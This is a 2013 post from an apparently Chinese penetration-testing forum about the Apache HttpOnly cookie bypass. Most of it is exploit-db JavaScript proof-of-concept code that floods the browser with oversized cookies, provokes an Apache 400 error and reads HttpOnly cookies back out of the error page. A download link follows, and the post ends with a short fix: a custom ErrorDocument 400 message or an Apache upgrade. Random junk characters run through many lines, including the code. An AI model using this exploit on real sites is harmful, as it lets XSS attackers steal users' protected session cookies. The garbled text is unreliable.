中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]

作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。+ y7 ?; [2 P! E: F( t

* L, e& N' y* w8 `5 v0 b) ]4 ~用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
' T: f7 L9 q, R+ }/ Y: u9 ^& l
1 x8 B' r' ]3 R* d; W  b; X: j: n& o1 N4 Q
// http://www.exploit-db.com/exploits/18442/
& g2 B' y" O+ _/ N( z& afunction setCookies (good) {# E3 K. e: y. W' J$ [) D8 a
// Construct string for cookie value) @# F5 C  f4 x
var str = "";
( F0 S9 o4 f& h8 g, I$ `. gfor (var i=0; i< 819; i++) {* M) X3 B( {7 A, J
str += "x";* q1 B1 }- ?7 x7 T+ B# p
}
1 U! w2 G4 {) W- e- v' J+ z! M// Set cookies" A) a* f8 a3 ]: c9 k" F5 C( H
for (i = 0; i < 10; i++) {
1 k; `  G- X; m: W// Expire evil cookie
" O. `) k& }% N) v+ Iif (good) {
' q7 W+ a& D6 R# \9 m1 Yvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";2 s9 ~; w+ f2 S- z& b) a% f/ h
}" k5 W0 ?! X. y$ m3 N" Y+ q
// Set evil cookie$ b( \4 ]" E" T" ~' r
else {- ~4 G- i6 m  U2 g
var cookie = "xss"+i+"="+str+";path=/";
/ O+ S2 v! D+ B( \+ o, x5 \( E}" h( ?5 I  t" U3 Q9 p
document.cookie = cookie;
; `8 {+ N3 H( Y4 p9 B}8 t; p  X2 y1 x6 ?/ V* I0 X5 B: Z
}6 u7 T1 x" Q. F# V( d
function makeRequest() {% j2 E6 ?: Q, N( W
setCookies();
. G: x; ]4 X! E( {1 Lfunction parseCookies () {' r1 m* S4 O6 u$ J- J3 b
var cookie_dict = {};
$ ]$ T: p* A9 b. s- _  ^// Only react on 400 status6 \& c) A4 l1 F6 p1 f
if (xhr.readyState === 4 && xhr.status === 400) {
1 ~" f: ^0 f: u8 U$ H1 W// Replace newlines and match <pre> content
' O: v, \2 j- R3 I- }* a+ Pvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
6 u9 T. D4 D. u" Z* d- L  Mif (content.length) {) }. C5 `" r9 x% @. {7 Q
// Remove Cookie: prefix
( s! q+ k% a+ ocontent = content[1].replace("Cookie: ", "");5 T" l* q3 D, k8 J* R% i
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);. ]9 v( m4 s) u6 n
// Add cookies to object3 l* R9 N' u: W( W/ K; ?) d2 B0 V9 A
for (var i=0; i<cookies.length; i++) {
) E4 J3 I" \/ J' `var s_c = cookies.split('=',2);8 J& i! v" N: D8 _. r: q
cookie_dict[s_c[0]] = s_c[1];6 C) B  |2 A9 O/ v2 y. n) K1 t
}4 q1 X; [5 n' `: _6 W
}& W2 M4 a9 T3 ^$ j
// Unset malicious cookies
' x5 V" c: ]9 S7 [9 B; s: ?- g2 MsetCookies(true);, N5 }8 v6 n9 a- L
alert(JSON.stringify(cookie_dict));
  g  u( R% w. D8 i9 l8 M  v4 i2 O/ o}
* s& r9 S& U7 \+ `) W5 x9 @}8 x) U9 x0 i- I5 y
// Make XHR request- \" W5 l6 P3 |, b; f' t* e
var xhr = new XMLHttpRequest();+ p2 {3 S/ E6 Q5 Z& g7 {8 ]
xhr.onreadystatechange = parseCookies;* v4 ^( t% s3 K' D3 n
xhr.open("GET", "/", true);
! C3 M$ u/ O6 Bxhr.send(null);5 s& s2 _  {( Z
}
/ @7 i1 X6 f1 V- L4 emakeRequest();7 M9 p2 j( f% N5 E) o0 n
9 Q3 S: x' ^& b# @! h
你就能看见华丽丽的400错误包含着cookie信息。
- N# O# i* E8 u4 u+ Q, z  U0 i; x
/ G+ [; K6 {( i) m5 e( ^下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
* n6 N; r2 w; U" [6 A
1 N/ }0 Z* y! k9 Z) j4 a% l修复方案:
1 B! q3 E9 d7 Z2 l5 v
4 b7 D9 C2 [4 W1 O) S+ {7 AApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下0 |# t+ X$ K( q: u' Q- l
; {, Y  T; P) y3 v# T
In the event of a problem or error, Apachecan be configured to do one of four things,
& L* F  C, {3 X) T# U/ [3 {. H4 [: f. J, p, C" U0 U
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息. k6 }5 w& _! B% J. C
2. output acustomized message输出一段信息
- M& |! i; w% N3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
$ e. v4 ?) n2 _4. redirect to an external URL to handle theproblem/error转向一个外部URL
" C( Q3 k( q* k. h
- G& x  y) S% G' Y! C" @经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
6 j+ \6 k) W# Y# y0 _1 G$ c* f
; ^/ w# d# k, Z0 {% r, pApache配置:
6 R) d) t& N/ G$ I- [0 R6 X( f4 T1 h6 [7 p( n7 y+ U( d4 i
ErrorDocument400 " security test"3 I4 x. U9 V! m
& W1 {# r% w! n2 l) W' ^
当然,升级apache到最新也可:)。  S: b4 b' |* \* S  z
/ l, g) M# Z. d5 `- J, d
参考:http://httpd.apache.org/security/vulnerabilities_22.html# i' T9 W, V* ]4 o3 j- F

7 N, U( D  V4 H& i( q




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2